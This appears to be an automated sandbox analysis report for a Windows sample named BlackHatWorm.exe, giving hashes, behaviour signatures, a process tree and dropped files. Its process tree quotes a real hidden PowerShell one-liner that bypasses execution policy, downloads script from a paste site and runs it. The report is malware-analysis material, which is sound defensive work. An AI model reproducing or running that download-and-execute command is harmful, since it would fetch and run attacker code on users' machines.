Analysis

  • max time kernel
    149s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    01-09-2024 13:06

General

  • Target

    Black Hat Worm/Black Hat Worm/BlackHatWorm.exe

  • Size

    1.1MB

  • MD5

    ff2d2c4638eabb42aea87ae084f65a6c

  • SHA1

    7599c0c6ac507470ec8c85e9efa9f7bada802feb

  • SHA256

    65c71566954fa20c2806222a6fdfaf4129f16954a89d9e50821aa2d27c41d89f

  • SHA512

    b7864facd647afcbd436a80b3b60dc6b47137e96daa4d087fb0ec0ffc8e36e2c0305424f37cb5a2b3960cb38310b9403f79af83e68dadddb4f591a1389ed2ada

  • SSDEEP

    6144:PbnV479d+YiP3Y3QvevhEtHvSFCW9fQNmn6lCPDA2h:Z4/+YiP3Y3QveuHvSFC5lC7A4

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe
    "C:\Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious behavior: RenamesItself
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\VE892.bat""
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1228
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass -WindowStyle hidden -Command "Invoke-Expression ((Invoke-WebRequest -Uri 'https://rentry.co/owb6fgkv/raw').Content)"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2672
    • C:\Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe
      "C:\Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2532
  • C:\Windows\system32\wbem\WmiApSrv.exe
    C:\Windows\system32\wbem\WmiApSrv.exe
    1⤵
      PID:2912

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\VE892.bat

      Filesize

      4KB

      MD5

      38357e9b0613f8d53f1c4f48ea878a87

      SHA1

      f29cb48cfc641875a0e1dd2b7885ba690585d088

      SHA256

      a1ccc3aec53b07556113980c22005cca41048a5a0afb05fa0cb2bed3fe79cd84

      SHA512

      8959d0e5a756048d6cd9b0d15cc3c32d1e8fc00ce72e4807d3928603371e0ea291be8cfbdb10cf289f4078312d3f59d500be126a0657c2ba973292f3cdc9ba68

    • \Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe

      Filesize

      1.1MB

      MD5

      379c5965cce3f840b0fc343db0b0affd

      SHA1

      118b71977885860edc43c3b8fca2257893249dd7

      SHA256

      6efbc60a7419fbe7bf732281821b68a12b5e8dc2b0da35f9191d9cc6bcff98b6

      SHA512

      4bc85b56a12522bcd788d3fae2ded0d2b757dc1f6a0d0ff76066b575236f240ce9aeb3639b617ab7fb4b28e29ff24ec60a273df410b6e1dd7bffe9f3faf85299

    • memory/2532-21-0x0000000074160000-0x000000007484E000-memory.dmp

      Filesize

      6.9MB

    • memory/2532-20-0x0000000000190000-0x00000000002B4000-memory.dmp

      Filesize

      1.1MB

    • memory/2532-25-0x0000000074160000-0x000000007484E000-memory.dmp

      Filesize

      6.9MB

    • memory/2604-0-0x000000007416E000-0x000000007416F000-memory.dmp

      Filesize

      4KB

    • memory/2604-1-0x00000000010D0000-0x00000000011F4000-memory.dmp

      Filesize

      1.1MB

    • memory/2604-2-0x0000000074160000-0x000000007484E000-memory.dmp

      Filesize

      6.9MB

    • memory/2604-24-0x0000000074160000-0x000000007484E000-memory.dmp

      Filesize

      6.9MB